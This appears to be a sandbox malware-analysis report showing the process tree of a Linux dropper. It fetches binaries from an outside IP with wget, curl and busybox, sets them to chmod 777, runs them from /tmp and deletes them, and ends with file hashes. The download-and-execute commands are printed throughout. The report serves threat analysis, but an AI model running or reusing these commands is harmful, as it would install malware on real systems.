/usr/bin/curlcurl -O http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:945
-
-
/bin/chmodchmod 777 kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl./kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:948
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:949
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:951
-
-
/bin/chmodchmod 777 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs./42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:954
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:955
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:957
-
-
/bin/chmodchmod 777 duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ./duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:960
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:961
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:963
-
-
/bin/chmodchmod 777 u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq./u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:966
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:967
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:969
-
-
/bin/chmodchmod 777 MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL./MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:972
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:973
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:975
-
-
/bin/chmodchmod 777 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27./9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:978
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:979
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:981
-
-
/bin/chmodchmod 777 znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA./znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:984
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97